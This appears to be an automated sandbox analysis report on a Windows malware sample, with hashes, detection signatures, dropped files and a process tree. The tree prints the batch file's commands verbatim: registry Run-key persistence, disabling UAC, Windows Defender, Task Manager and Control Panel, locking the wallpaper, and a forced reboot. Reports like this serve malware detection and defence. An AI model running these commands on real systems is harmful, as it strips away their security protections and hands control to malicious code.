Analysis

  • max time kernel
    50s
  • max time network
    56s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/02/2024, 05:51

Errors

Reason
Machine shutdown

General

  • Target

    240204-b61b1seff6.exe

  • Size

    11.5MB

  • MD5

    cbefa3dd01682c7ae01476a35c069ca8

  • SHA1

    0a7fde7402d314993d0b77b87b796f480c8bbec4

  • SHA256

    9a8a71e84dbbcea6ca2286d811db5d2df586d01e13654b034f77ffd6dbed599a

  • SHA512

    41a1dff4610230d1cf72c0c42b6c7eef8a12c991cb42ed28cd2268f20f1978b14fba9e17081cdbe411963bc7dcd3273046d1ddc7427f6d9cc117ea592833ed8d

  • SSDEEP

    196608:knW3NrRSIGB4e6rVwKQ8QNeL8W6sXh9rcWdTXfxo5FKKxuAUKPZ7CwI7qMh:kn/r6CKENjsXr9TX5rKRCwI7

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Detects executables embedding registry key / value combination indicative of disabling Windows Defender features 3 IoCs
  • UPX dump on OEP (original entry point) 3 IoCs
  • Disables Task Manager via registry modification
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Windows directory 6 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry key 1 TTPs 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\240204-b61b1seff6.exe
    "C:\Users\Admin\AppData\Local\Temp\240204-b61b1seff6.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4668
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7D2F.tmp\HorrorTubies.bat""
      2⤵
      • Drops file in Windows directory
      • Suspicious use of WriteProcessMemory
      PID:1828
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v mbrsetup /d c:\windows\winbase_base_procid_none\secureloc0x65\mbrsetup.exe /f
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:5016
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v gdifuncs /d c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe /f
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:1924
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
        3⤵
        • Sets desktop wallpaper using registry
        PID:4868
      • C:\Windows\SysWOW64\rundll32.exe
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        3⤵
          PID:4992
        • C:\Windows\SysWOW64\reg.exe
          reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
          3⤵
          • Modifies registry key
          PID:1948
        • C:\Windows\SysWOW64\reg.exe
          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          3⤵
          • UAC bypass
          • Modifies registry key
          PID:5048
        • C:\Windows\SysWOW64\reg.exe
          Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
          3⤵
            PID:1704
          • C:\Windows\SysWOW64\reg.exe
            REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            3⤵
            • Modifies registry key
            PID:4000
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
            3⤵
              PID:4980
            • C:\Windows\SysWOW64\shutdown.exe
              shutdown /r /t 00
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1060
        • C:\Windows\system32\LogonUI.exe
          "LogonUI.exe" /flags:0x4 /state0:0xa3993055 /state1:0x41c64e6d
          1⤵
          • Modifies data under HKEY_USERS
          • Suspicious use of SetWindowsHookEx
          PID:1628

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\7D2F.tmp\HorrorTubies.bat

          Filesize

          1KB

          MD5

          f014698e88eda534c88ce46a17e34d3c

          SHA1

          5f33f606179fea1404144d60af54fb829ea108b5

          SHA256

          35eda9f76ede828a68e030a5b966fbf6a8c3f67146099eb0a866fb492733c909

          SHA512

          79360bdc41762c105fecb07ca97fb4336394d2189f111b7040643d02c12481561aaf6b47c91c685cb7e4396c1a37d8c8eff5d4965baafe83894948316b35805f

        • C:\Users\Admin\AppData\Local\Temp\7D2F.tmp\bg.bmp

          Filesize

          2.2MB

          MD5

          a91e5b7686d4f631a2bdf654a3a491f1

          SHA1

          d5760f5c7463b588b0c74bbc86237aed136b9fe9

          SHA256

          45991d6379452ead78a54e3be31eb3fe9c6ae386737482192ded081832044aea

          SHA512

          86cee44d58c7d9ed51caffb6cb6b55184a3c4653dc76ca41f4bb8a7c5bef9b67cf7f920db2111c1a838930bf9171ff49e17e042d9d0ce13205f13e7a364e1a3d

        • C:\Users\Admin\AppData\Local\Temp\7D2F.tmp\gdifuncs.exe

          Filesize

          76KB

          MD5

          9b104d42649fa52651a2ec25d7e48322

          SHA1

          d9fe22ef9daf5055519ebb9e4137a7b6b5ffc030

          SHA256

          23aef8bc6d0dcad2089fd08ec5932aba5feab3972b07583fa50d4c794eca5af9

          SHA512

          55794cbd02f8678fdc44dced755ba4cf9d4ed63a30bded6635dc5403ffa2435339422288d48a8ef31fe523b080359b051e86ec8f6823b891e83ed1495fa5daa8

        • C:\Users\Admin\AppData\Local\Temp\7D2F.tmp\mainbgtheme.wav

          Filesize

          11.9MB

          MD5

          6c372ee0f913e4a6e4e2f6904811e9fe

          SHA1

          708c269055c6d4ac8c140ac6c34f246449415724

          SHA256

          886ea9c5bd22cf801be7b981f4ba016c48accdf66eb66b1dd8c7fafb2e2b96ae

          SHA512

          368f13e54d87bcca012f7be744d3a7df745fed72d11c11423acdc057d3f667b698b0617e9df2e2470ded607935270263edd0318a8022d32d5a8457e7d22d295c

        • C:\Users\Admin\AppData\Local\Temp\7D2F.tmp\mbrsetup.exe

          Filesize

          1.3MB

          MD5

          4f9777b4f603a437abedb856d09d42ba

          SHA1

          9a50bdb720e937ae6a8fd4140233b600414b393e

          SHA256

          c5309feb33af8626132eb1a44e528c3317b5499a87170044eadc56ae82b1bacd

          SHA512

          c6971d5256feb8ebd75b758055843870fd1beede3430efc82f4e3f0dae56d9b9241b0ac8c653d5f5ab3fe61a80729c4e096b169d16d2e09ccb7efcc0be8d49a8

        • memory/4668-0-0x0000000000400000-0x00000000014D1000-memory.dmp

          Filesize

          16.8MB

        • memory/4668-14-0x0000000000400000-0x00000000014D1000-memory.dmp

          Filesize

          16.8MB

        • memory/4668-30-0x0000000000400000-0x00000000014D1000-memory.dmp

          Filesize

          16.8MB